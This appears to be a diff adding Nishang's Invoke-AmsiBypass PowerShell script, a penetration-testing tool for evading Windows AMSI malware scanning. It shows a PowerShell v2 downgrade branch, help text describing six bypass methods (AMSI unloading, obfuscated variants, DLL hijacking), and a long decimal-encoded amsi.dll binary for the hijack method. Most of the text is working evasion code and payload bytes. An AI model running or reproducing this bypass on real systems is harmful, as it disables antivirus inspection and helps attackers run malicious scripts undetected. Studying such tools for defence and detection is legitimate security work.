+ & "$pwd\powershell.exe" + + } + } + + "psv2" + { + Write-Verbose "Using PowerShell version 2 which doesn't support AMSI." + if ($ShowOnly -eq $True) + { + Write-Output "If .Net version 2.0.50727 is installed, run powershell -v 2 and run scripts from the new PowerShell process." + } + else + { + Write-Verbose "Checking if .Net version 2.0.50727 is installed." + $versions = Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | Get-ItemProperty -name Version -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select -ExpandProperty Version + if($versions -match "2.0.50727") + { + Write-Verbose ".Net version 2.0.50727 found." + Write-Output "Executing the bypass." + powershell.exe -version 2 + } + else + { + Write-Verbose ".Net version 2.0.50727 not found. Can't start PowerShell v2." + } + } + } + + "obfuscation" + { + Write-Output "AMSI and the AVs which support it can be bypassed using obfuscation techqniues." + Write-Output "ISE-Steroids (http://www.powertheshell.com/isesteroidsmanual/download/) and Invoke-Obfuscation can be used (https://github.com/danielbohannon/Invoke-Obfuscation)." + } + } + +} + +function Invoke-AmsiBypass +{ +<# +.SYNOPSIS +Nishang script which uses publicly known methods to bypass/avoid AMSI. + +.DESCRIPTION +This script implements publicly known methods bypass or avoid AMSI on Windows machines. + +AMSI is a script malware detection mechanism enabled by default in Windows 10. +(https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx) + +This script implements 6 methods of bypassing AMSI. +unload - Method by Matt Graeber. Unloads AMSI from current PowerShell session. +unload2 - Another method by Matt Graeber. Unloads AMSI from current PowerShell session. +unloadsilent - Another method by Matt Graeber. Unloads AMSI and avoids WMF5 autologging. +unloadobfuscated - 'unload' method above obfuscated with Daneil Bohannon's Invoke-Obfuscation - which avoids WMF5 autologging. 
+dllhijack - Method by Cornelis de Plaa. The amsi.dll used in the code is from p0wnedshell (https://github.com/Cn33liz/p0wnedShell) +psv2 - If .net 2.0.50727 is available on Windows 10. PowerShell v2 is launched which doesn't support AMSI. + +The script also provides information on tools which can be used for obfuscation: +ISE-Steroids (http://www.powertheshell.com/isesteroidsmanual/download/) +Invoke-Obfuscation (https://github.com/danielbohannon/Invoke-Obfuscation) + +.PARAMETER Method +The method to be used for elevation. Defaut one is unloadsilent. + +.PARAMETER ShowOnly +The bypass is not executed. Just shown to the user. + +.EXAMPLE +PS > Invoke-AmsiBypass -Verbose +Above command runs the unloadsilent method. + +.EXAMPLE +PS > Invoke-PsUACme -Method unloadobfuscated -Verbose +Above command runs the unloadobfuscated method. + +.LINK +http://www.labofapenetrationtester.com/2016/09/amsi.html +https://github.com/samratashok/nishang +#> + + + [CmdletBinding()] Param( + + [Parameter(Position = 0, Mandatory = $False)] + [ValidateSet("unload","unloadsilent","unloadobfuscated","unload2","dllhijack","psv2","obfuscation")] + [String] + $Method = "unloadsilent", + + [Parameter(Position = 1, Mandatory = $False)] + [Switch] + $ShowOnly + ) + + $AmsiX86 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 248 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 190 171 71 149 250 202 41 198 250 202 41 198 250 202 41 198 243 178 186 198 248 202 41 198 148 145 40 199 249 202 41 198 148 145 42 199 251 202 41 198 148 145 44 199 242 202 41 198 148 145 45 199 241 202 41 198 39 53 226 198 248 202 41 198 250 202 40 198 231 202 41 198 40 145 33 199 251 202 41 198 40 145 214 198 251 202 41 198 40 145 43 199 251 202 41 198 82 105 99 104 250 202 
41 198 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 76 1 6 0 144 29 62 87 0 0 0 0 0 0 0 0 224 0 2 33 11 1 14 0 0 14 0 0 0 18 0 0 0 0 0 0 43 19 0 0 0 16 0 0 0 32 0 0 0 0 0 16 0 16 0 0 0 2 0 0 6 0 0 0 0 0 0 0 6 0 0 0 0 0 0 0 0 112 0 0 0 4 0 0 0 0 0 0 2 0 64 1 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 148 36 0 0 80 0 0 0 0 80 0 0 224 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 96 0 0 44 1 0 0 176 32 0 0 112 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 33 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 112 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 124 12 0 0 0 16 0 0 0 14 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 220 7 0 0 0 32 0 0 0 8 0 0 0 18 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 100 97 116 97 0 0 0 136 3 0 0 0 48 0 0 0 2 0 0 0 26 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 192 46 103 102 105 100 115 0 0 20 0 0 0 0 64 0 0 0 2 0 0 0 28 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 1 0 0 0 80 0 0 0 2 0 0 0 30 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 44 1 0 0 0 96 0 0 0 2 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 51 192 194 12 0 59 13 4 48 0 16 242 117 2 242 195 242 233 96 3 0 0 85 139 236 139 69 12 131 232 0 116 51 131 232 1 116 32 131 232 1 116 17 131 232 1 116 5 51 192 64 235 48 232 245 4 0 0 235 5 232 207 4 0 0 15 182 192 235 31 255 117 16 255 117 8 232 24 0 0 0 89 235 16 
131 125 16 0 15 149 192 15 182 192 80 232 23 1 0 0 89 93 194 12 0 106 16 104 24 36 0 16 232 123 9 0 0 106 0 232 35 5 0 0 89 132 192 117 7 51 192 233 224 0 0 0 232 40 4 0 0 136 69 227 179 1 136 93 231 131 101 252 0 131 61 60 51 0 16 0 116 7 106 7 232 203 7 0 0 199 5 60 51 0 16 1 0 0 0 232 74 4 0 0 132 192 116 101 232 206 8 0 0 104 186 25 0 16 232 177 6 0 0 232 93 7 0 0 199 4 36 57 24 0 16 232 160 6 0 0 232 112 7 0 0 199 4 36 128 32 0 16 104 124 32 0 16 232 78 11 0 0 89 89 133 192 117 41 232 237 3 0 0 132 192 116 32 104 120 32 0 16 104 116 32 0 16 232 42 11 0 0 89 89 199 5 60 51 0 16 2 0 0 0 50 219 136 93 231 199 69 252 254 255 255 255 232 68 0 0 0 132 219 15 133 76 255 255 255 232 52 7 0 0 139 240 131 62 0 116 30 86 232 40 5 0 0 89 132 192 116 19 255 117 12 106 2 255 117 8 139 54 139 206 232 136 8 0 0 255 214 255 5 24 48 0 16 51 192 64 232 201 8 0 0 195 138 93 231 255 117 227 232 131 5 0 0 89 195 106 12 104 56 36 0 16 232 105 8 0 0 161 24 48 0 16 133 192 127 4 51 192 235 79 72 163 24 48 0 16 232 22 3 0 0 136 69 228 131 101 252 0 131 61 60 51 0 16 2 116 7 106 7 232 190 6 0 0 232 180 3 0 0 131 37 60 51 0 16 0 199 69 252 254 255 255 255 232 27 0 0 0 106 0 255 117 8 232 65 5 0 0 89 89 51 201 132 192 15 149 193 139 193 232 78 8 0 0 195 232 164 3 0 0 255 117 228 232 6 5 0 0 89 195 106 12 104 88 36 0 16 232 236 7 0 0 131 101 252 0 139 125 12 131 255 1 116 10 131 255 2 116 5 139 93 8 235 49 255 117 16 87 139 93 8 83 232 218 0 0 0 139 240 137 117 228 133 246 15 132 190 0 0 0 255 117 16 87 83 232 216 253 255 255 139 240 137 117 228 133 246 15 132 167 0 0 0 131 255 1 117 7 83 232 198 9 0 0 89 255 117 16 87 83 232 159 253 255 255 139 240 137 117 228 131 255 1 117 43 133 246 117 30 255 117 16 80 83 232 135 253 255 255 255 117 16 86 83 232 147 253 255 255 255 117 16 86 83 232 116 0 0 0 131 255 1 117 4 133 246 116 4 133 255 117 11 83 232 130 9 0 0 89 133 255 116 5 131 255 3 117 72 255 117 16 87 83 232 98 253 255 255 139 240 137 117 228 133 246 116 53 255 117 16 87 83 232 58 0 0 0 
139 240 235 36 139 77 236 139 1 81 255 48 104 22 16 0 16 255 117 16 255 117 12 255 117 8 232 86 2 0 0 131 196 24 195 139 101 232 51 246 137 117 228 199 69 252 254 255 255 255 139 198 232 54 7 0 0 195 85 139 236 86 139 53 160 32 0 16 133 246 117 5 51 192 64 235 18 255 117 16 139 206 255 117 12 255 117 8 232 193 6 0 0 255 214 94 93 194 12 0 85 139 236 131 125 12 1 117 5 232 88 4 0 0 255 117 16 255 117 12 255 117 8 232 177 254 255 255 131 196 12 93 194 12 0 85 139 236 106 0 255 21 40 32 0 16 255 117 8 255 21 0 32 0 16 104 9 4 0 192 255 21 4 32 0 16 80 255 21 8 32 0 16 93 195 85 139 236 129 236 36 3 0 0 106 23 232 234 8 0 0 133 192 116 5 106 2 89 205 41 163 32 49 0 16 137 13 28 49 0 16 137 21 24 49 0 16 137 29 20 49 0 16 137 53 16 49 0 16 137 61 12 49 0 16 102 140 21 56 49 0 16 102 140 13 44 49 0 16 102 140 29 8 49 0 16 102 140 5 4 49 0 16 102 140 37 0 49 0 16 102 140 45 252 48 0 16 156 143 5 48 49 0 16 139 69 0 163 36 49 0 16 139 69 4 163 40 49 0 16 141 69 8 163 52 49 0 16 139 133 220 252 255 255 199 5 112 48 0 16 1 0 1 0 161 40 49 0 16 163 44 48 0 16 199 5 32 48 0 16 9 4 0 192 199 5 36 48 0 16 1 0 0 0 199 5 48 48 0 16 1 0 0 0 106 4 88 107 192 0 199 128 52 48 0 16 2 0 0 0 106 4 88 107 192 0 139 13 4 48 0 16 137 76 5 248 106 4 88 193 224 0 139 13 0 48 0 16 137 76 5 248 104 164 32 0 16 232 225 254 255 255 139 229 93 195 85 139 236 139 69 8 86 139 72 60 3 200 15 183 65 20 141 81 24 3 208 15 183 65 6 107 240 40 3 242 59 214 116 25 139 77 12 59 74 12 114 10 139 66 8 3 66 12 59 200 114 12 131 194 40 59 214 117 234 51 192 94 93 195 139 194 235 249 232 85 7 0 0 133 192 117 3 50 192 195 100 161 24 0 0 0 86 190 64 51 0 16 139 80 4 235 4 59 208 116 16 51 192 139 202 240 15 177 14 133 192 117 240 50 192 94 195 176 1 94 195 232 32 7 0 0 133 192 116 7 232 118 5 0 0 235 5 232 77 7 0 0 176 1 195 106 0 232 207 0 0 0 132 192 89 15 149 192 195 232 97 7 0 0 132 192 117 3 50 192 195 232 85 7 0 0 132 192 117 7 232 76 7 0 0 235 237 176 1 195 232 66 7 0 0 232 61 7 0 0 176 1 195 85 139 236 
232 203 6 0 0 133 192 117 24 131 125 12 1 117 18 255 117 16 139 77 20 80 255 117 8 232 136 4 0 0 255 85 20 255 117 28 255 117 24 232 219 6 0 0 89 89 93 195 232 155 6 0 0 133 192 116 12 104 68 51 0 16 232 220 6 0 0 89 195 232 240 6 0 0 133 192 15 132 217 6 0 0 195 106 0 232 221 6 0 0 89 233 215 6 0 0 85 139 236 131 125 8 0 117 7 198 5 92 51 0 16 1 232 186 4 0 0 232 189 6 0 0 132 192 117 4 50 192 93 195 232 176 6 0 0 132 192 117 10 106 0 232 165 6 0 0 89 235 233 176 1 93 195 85 139 236 131 236 12 86 139 117 8 133 246 116 5 131 254 1 117 124 232 31 6 0 0 133 192 116 42 133 246 117 38 104 68 51 0 16 232 80 6 0 0 89 133 192 116 4 50 192 235 87 104 80 51 0 16 232 61 6 0 0 247 216 89 26 192 254 192 235 68 161 4 48 0 16 141 117 244 87 131 224 31 191 68 51 0 16 106 32 89 43 200 131 200 255 211 200 51 5 4 48 0 16 137 69 244 137 69 248 137 69 252 165 165 165 191 80 51 0 16 137 69 244 137 69 248 141 117 244 137 69 252 176 1 165 165 165 95 94 139 229 93 195 106 5 232 6 2 0 0 204 106 8 104 120 36 0 16 232 117 3 0 0 131 101 252 0 184 77 90 0 0 102 57 5 0 0 0 16 117 96 161 60 0 0 16 129 184 0 0 0 16 80 69 0 0 117 79 185 11 1 0 0 102 57 136 24 0 0 16 117 65 139 69 8 185 0 0 0 16 43 193 80 81 232 180 253 255 255 89 89 133 192 116 42 247 64 36 0 0 0 128 117 33 199 69 252 254 255 255 255 176 1 235 31 139 69 236 139 0 51 201 129 56 5 0 0 192 15 148 193 139 193 195 139 101 232 199 69 252 254 255 255 255 50 192 232 59 3 0 0 195 85 139 236 232 11 5 0 0 133 192 116 15 128 125 8 0 117 9 51 192 185 64 51 0 16 135 1 93 195 85 139 236 128 61 92 51 0 16 0 116 6 128 125 12 0 117 18 255 117 8 232 67 5 0 0 255 117 8 232 59 5 0 0 89 89 176 1 93 195 85 139 236 161 4 48 0 16 139 200 51 5 68 51 0 16 131 225 31 255 117 8 211 200 131 248 255 117 7 232 1 5 0 0 235 11 104 68 51 0 16 232 233 4 0 0 89 247 216 89 27 192 247 208 35 69 8 93 195 85 139 236 255 117 8 232 186 255 255 255 247 216 89 27 192 247 216 72 93 195 85 139 236 131 236 20 131 101 244 0 131 101 248 0 161 4 48 0 16 86 87 191 78 230 64 187 190 
0 0 255 255 59 199 116 13 133 198 116 9 247 208 163 0 48 0 16 235 102 141 69 244 80 255 21 28 32 0 16 139 69 248 51 69 244 137 69 252 255 21 32 32 0 16 49 69 252 255 21 36 32 0 16 49 69 252 141 69 236 80 255 21 16 32 0 16 139 77 240 141 69 252 51 77 236 51 77 252 51 200 59 207 117 7 185 79 230 64 187 235 16 133 206 117 12 139 193 13 17 71 0 0 193 224 16 11 200 137 13 4 48 0 16 247 209 137 13 0 48 0 16 95 94 139 229 93 195 104 96 51 0 16 255 21 24 32 0 16 195 104 96 51 0 16 232 229 3 0 0 89 195 184 104 51 0 16 195 184 112 51 0 16 195 232 239 255 255 255 139 72 4 131 8 4 137 72 4 232 231 255 255 255 139 72 4 131 8 2 137 72 4 195 184 132 51 0 16 195 85 139 236 129 236 36 3 0 0 83 86 106 23 232 234 3 0 0 133 192 116 5 139 77 8 205 41 51 246 141 133 220 252 255 255 104 204 2 0 0 86 80 137 53 120 51 0 16 232 133 3 0 0 131 196 12 137 133 140 253 255 255 137 141 136 253 255 255 137 149 132 253 255 255 137 157 128 253 255 255 137 181 124 253 255 255 137 189 120 253 255 255 102 140 149 164 253 255 255 102 140 141 152 253 255 255 102 140 157 116 253 255 255 102 140 133 112 253 255 255 102 140 165 108 253 255 255 102 140 173 104 253 255 255 156 143 133 156 253 255 255 139 69 4 137 133 148 253 255 255 141 69 4 137 133 160 253 255 255 199 133 220 252 255 255 1 0 1 0 139 64 252 106 80 137 133 144 253 255 255 141 69 168 86 80 232 252 2 0 0 139 69 4 131 196 12 199 69 168 21 0 0 64 199 69 172 1 0 0 0 137 69 180 255 21 20 32 0 16 86 141 88 255 247 219 141 69 168 137 69 248 141 133 220 252 255 255 26 219 137 69 252 254 195 255 21 40 32 0 16 141 69 248 80 255 21 0 32 0 16 133 192 117 13 15 182 195 247 216 27 192 33 5 120 51 0 16 94 91 139 229 93 195 83 86 190 8 36 0 16 187 8 36 0 16 59 243 115 24 87 139 62 133 255 116 9 139 207 232 56 0 0 0 255 215 131 198 4 59 243 114 234 95 94 91 195 83 86 190 16 36 0 16 187 16 36 0 16 59 243 115 24 87 139 62 133 255 116 9 139 207 232 13 0 0 0 255 215 131 198 4 59 243 114 234 95 94 91 195 255 37 112 32 0 16 204 204 204 204 204 104 75 26 0 16 100 255 
53 0 0 0 0 139 68 36 16 137 108 36 16 141 108 36 16 43 224 83 86 87 161 4 48 0 16 49 69 252 51 197 80 137 101 232 255 117 248 139 69 252 199 69 252 254 255 255 255 137 69 248 141 69 240 100 163 0 0 0 0 242 195 139 77 240 100 137 13 0 0 0 0 89 95 95 94 91 139 229 93 81 242 195 85 139 236 255 117 20 255 117 16 255 117 12 255 117 8 104 5 16 0 16 104 4 48 0 16 232 203 1 0 0 131 196 24 93 195 85 139 236 131 37 124 51 0 16 0 131 236 44 83 51 219 67 9 29 16 48 0 16 106 10 232 228 1 0 0 133 192 15 132 116 1 0 0 131 101 236 0 51 192 131 13 16 48 0 16 2 51 201 86 87 137 29 124 51 0 16 141 125 212 83 15 162 139 243 91 137 7 137 119 4 137 79 8 137 87 12 139 69 212 139 77 224 137 69 244 129 241 105 110 101 73 139 69 220 53 110 116 101 108 11 200 139 69 216 53 71 101 110 117 11 200 247 217 106 1 88 26 201 106 0 128 193 1 89 83 15 162 139 243 91 137 7 137 119 4 137 79 8 137 87 12 116 67 139 69 212 37 240 63 255 15 61 192 6 1 0 116 35 61 96 6 2 0 116 28 61 112 6 2 0 116 21 61 80 6 3 0 116 14 61 96 6 3 0 116 7 61 112 6 3 0 117 17 139 61 128 51 0 16 131 207 1 137 61 128 51 0 16 235 6 139 61 128 51 0 16 131 125 244 7 139 69 224 137 69 228 139 69 220 137 69 248 137 69 232 124 50 106 7 88 51 201 83 15 162 139 243 91 141 93 212 137 3 137 115 4 137 75 8 137 83 12 139 69 216 169 0 2 0 0 137 69 236 139 69 248 116 9 131 207 2 137 61 128 51 0 16 95 94 169 0 0 16 0 116 109 131 13 16 48 0 16 4 199 5 124 51 0 16 2 0 0 0 169 0 0 0 8 116 85 169 0 0 0 16 116 78 51 201 15 1 208 137 69 240 137 85 244 139 69 240 139 77 244 131 224 6 51 201 131 248 6 117 51 133 201 117 47 161 16 48 0 16 131 200 8 199 5 124 51 0 16 3 0 0 0 246 69 236 32 163 16 48 0 16 116 18 131 200 32 199 5 124 51 0 16 5 0 0 0 163 16 48 0 16 51 192 91 139 229 93 195 51 192 57 5 20 48 0 16 15 149 192 195 195 255 37 52 32 0 16 255 37 60 32 0 16 255 37 56 32 0 16 255 37 48 32 0 16 255 37 64 32 0 16 255 37 104 32 0 16 255 37 100 32 0 16 255 37 96 32 0 16 255 37 92 32 0 16 255 37 88 32 0 16 255 37 84 32 0 16 255 37 80 32 0 16 255 37 76 32 
0 16 255 37 72 32 0 16 255 37 12 32 0 16 176 1 195 51 192 195 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 198 38 0 0 0 39 0 0 20 39 0 0 40 39 0 0 68 39 0 0 186 39 0 0 164 39 0 0 138 39 0 0 116 39 0 0 94 39 0 0 226 38 0 0 0 0 0 0 184 37 0 0 84 37 0 0 152 37 0 0 118 37 0 0 194 37 0 0 0 0 0 0 154 38 0 0 140 38 0 0 116 38 0 0 88 38 0 0 60 38 0 0 26 38 0 0 8 38 0 0 250 37 0 0 238 37 0 0 0 0 0 0 27 28 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 48 0 16 112 48 0 16 0 0 0 0 0 0 0 0 144 29 62 87 0 0 0 0 2 0 0 0 61 0 0 0 132 33 0 0 132 19 0 0 0 0 0 0 144 29 62 87 0 0 0 0 12 0 0 0 20 0 0 0 196 33 0 0 196 19 0 0 0 0 0 0 144 29 62 87 0 0 0 0 13 0 0 0 44 2 0 0 216 33 0 0 216 19 0 0 0 0 0 0 144 29 62 87 0 0 0 0 14 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 92 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 48 0 16 128 33 0 16 1 0 0 0 112 32 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 75 26 0 0 82 83 68 83 69 10 117 219 0 114 41 77 133 149 98 78 29 103 122 248 7 0 0 0 67 58 92 68 101 118 101 108 111 112 109 101 110 116 92 65 109 115 105 92 82 101 108 101 97 115 101 92 65 109 115 105 46 112 100 98 0 0 0 0 0 0 0 0 20 0 0 0 20 0 0 0 1 0 0 0 19 0 0 
0 71 67 84 76 0 16 0 0 124 12 0 0 46 116 101 120 116 36 109 110 0 0 0 0 0 32 0 0 112 0 0 0 46 105 100 97 116 97 36 53 0 0 0 0 112 32 0 0 4 0 0 0 46 48 48 99 102 103 0 0 116 32 0 0 4 0 0 0 46 67 82 84 36 88 67 65 0 0 0 0 120 32 0 0 4 0 0 0 46 67 82 84 36 88 67 90 0 0 0 0 124 32 0 0 4 0 0 0 46 67 82 84 36 88 73 65 0 0 0 0 128 32 0 0 4 0 0 0 46 67 82 84 36 88 73 90 0 0 0 0 132 32 0 0 4 0 0 0 46 67 82 84 36 88 80 65 0 0 0 0 136 32 0 0 4 0 0 0 46 67 82 84 36 88 80 90 0 0 0 0 140 32 0 0 4 0 0 0 46 67 82 84 36 88 84 65 0 0 0 0 144 32 0 0 4 0 0 0 46 67 82 84 36 88 84 90 0 0 0 0 160 32 0 0 220 0 0 0 46 114 100 97 116 97 0 0 128 33 0 0 4 0 0 0 46 114 100 97 116 97 36 115 120 100 97 116 97 0 0 0 132 33 0 0 128 2 0 0 46 114 100 97 116 97 36 122 122 122 100 98 103 0 0 0 4 36 0 0 4 0 0 0 46 114 116 99 36 73 65 65 0 0 0 0 8 36 0 0 4 0 0 0 46 114 116 99 36 73 90 90 0 0 0 0 12 36 0 0 4 0 0 0 46 114 116 99 36 84 65 65 0 0 0 0 16 36 0 0 4 0 0 0 46 114 116 99 36 84 90 90 0 0 0 0 24 36 0 0 124 0 0 0 46 120 100 97 116 97 36 120 0 0 0 0 148 36 0 0 60 0 0 0 46 105 100 97 116 97 36 50 0 0 0 0 208 36 0 0 20 0 0 0 46 105 100 97 116 97 36 51 0 0 0 0 228 36 0 0 112 0 0 0 46 105 100 97 116 97 36 52 0 0 0 0 84 37 0 0 136 2 0 0 46 105 100 97 116 97 36 54 0 0 0 0 0 48 0 0 24 0 0 0 46 100 97 116 97 0 0 0 24 48 0 0 112 3 0 0 46 98 115 115 0 0 0 0 0 64 0 0 20 0 0 0 46 103 102 105 100 115 36 121 0 0 0 0 0 80 0 0 88 0 0 0 46 114 115 114 99 36 48 49 0 0 0 0 96 80 0 0 128 1 0 0 46 114 115 114 99 36 48 50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 254 255 255 255 0 0 0 0 208 255 255 255 0 0 0 0 254 255 255 255 0 0 0 0 110 17 0 16 0 0 0 0 254 255 255 255 0 0 0 0 212 255 255 255 0 0 0 0 254 255 255 255 0 0 0 0 233 17 0 16 0 0 0 0 254 255 255 255 0 0 0 0 212 255 255 255 0 0 0 0 254 255 255 255 203 18 0 16 234 18 0 16 0 0 0 0 254 255 255 255 0 0 0 0 216 255 255 255 0 0 0 0 254 255 255 255 215 22 0 16 234 22 0 16 20 37 0 0 0 0 0 0 0 0 0 0 220 37 0 0 48 32 0 0 44 37 0 0 0 0 0 0 0 0 0 0 164 38 0 0 72 32 0 0 
228 36 0 0 0 0 0 0 0 0 0 0 206 39 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 198 38 0 0 0 39 0 0 20 39 0 0 40 39 0 0 68 39 0 0 186 39 0 0 164 39 0 0 138 39 0 0 116 39 0 0 94 39 0 0 226 38 0 0 0 0 0 0 184 37 0 0 84 37 0 0 152 37 0 0 118 37 0 0 194 37 0 0 0 0 0 0 154 38 0 0 140 38 0 0 116 38 0 0 88 38 0 0 60 38 0 0 26 38 0 0 8 38 0 0 250 37 0 0 238 37 0 0 0 0 0 0 40 0 95 95 116 101 108 101 109 101 116 114 121 95 109 97 105 110 95 105 110 118 111 107 101 95 116 114 105 103 103 101 114 0 41 0 95 95 116 101 108 101 109 101 116 114 121 95 109 97 105 110 95 114 101 116 117 114 110 95 116 114 105 103 103 101 114 0 37 0 95 95 115 116 100 95 116 121 112 101 95 105 110 102 111 95 100 101 115 116 114 111 121 95 108 105 115 116 0 0 72 0 109 101 109 115 101 116 0 0 53 0 95 101 120 99 101 112 116 95 104 97 110 100 108 101 114 52 95 99 111 109 109 111 110 0 86 67 82 85 78 84 73 77 69 49 52 48 46 100 108 108 0 0 56 0 95 105 110 105 116 116 101 114 109 0 57 0 95 105 110 105 116 116 101 114 109 95 101 0 65 0 95 115 101 104 95 102 105 108 116 101 114 95 100 108 108 0 53 0 95 105 110 105 116 105 97 108 105 122 101 95 110 97 114 114 111 119 95 101 110 118 105 114 111 110 109 101 110 116 0 0 54 0 95 105 110 105 116 105 97 108 105 122 101 95 111 110 101 120 105 116 95 116 97 98 108 101 0 0 62 0 95 114 101 103 105 115 116 101 114 95 111 110 101 120 105 116 95 102 117 110 99 116 105 111 110 0 36 0 95 101 120 101 99 117 116 101 95 111 110 101 120 105 116 95 116 97 98 108 101 0 31 0 95 99 114 116 95 97 116 101 120 105 116 0 23 0 95 99 101 120 105 116 0 0 97 112 105 45 109 115 45 119 105 110 45 99 114 116 45 114 117 110 116 105 109 101 45 108 49 45 49 45 48 46 100 108 108 0 130 5 85 110 104 97 110 100 108 101 100 69 120 99 101 112 116 105 111 110 70 105 108 116 101 114 0 0 67 5 83 101 116 85 110 104 97 110 100 108 101 100 69 120 99 101 112 116 105 111 110 70 105 108 116 101 114 0 9 2 71 101 116 67 117 114 114 101 110 116 80 114 111 99 101 115 115 0 97 5 84 101 114 109 105 110 97 116 
101 80 114 111 99 101 115 115 0 0 109 3 73 115 80 114 111 99 101 115 115 111 114 70 101 97 116 117 114 101 80 114 101 115 101 110 116 0 45 4 81 117 101 114 121 80 101 114 102 111 114 109 97 110 99 101 67 111 117 110 116 101 114 0 10 2 71 101 116 67 117 114 114 101 110 116 80 114 111 99 101 115 115 73 100 0 14 2 71 101 116 67 117 114 114 101 110 116 84 104 114 101 97 100 73 100 0 0 214 2 71 101 116 83 121 115 116 101 109 84 105 109 101 65 115 70 105 108 101 84 105 109 101 0 75 3 73 110 105 116 105 97 108 105 122 101 83 76 105 115 116 72 101 97 100 0 103 3 73 115 68 101 98 117 103 103 101 114 80 114 101 115 101 110 116 0 75 69 82 78 69 76 51 50 46 100 108 108 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 177 25 191 68 78 230 64 187 255 255 255 255 0 0 0 0 1 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 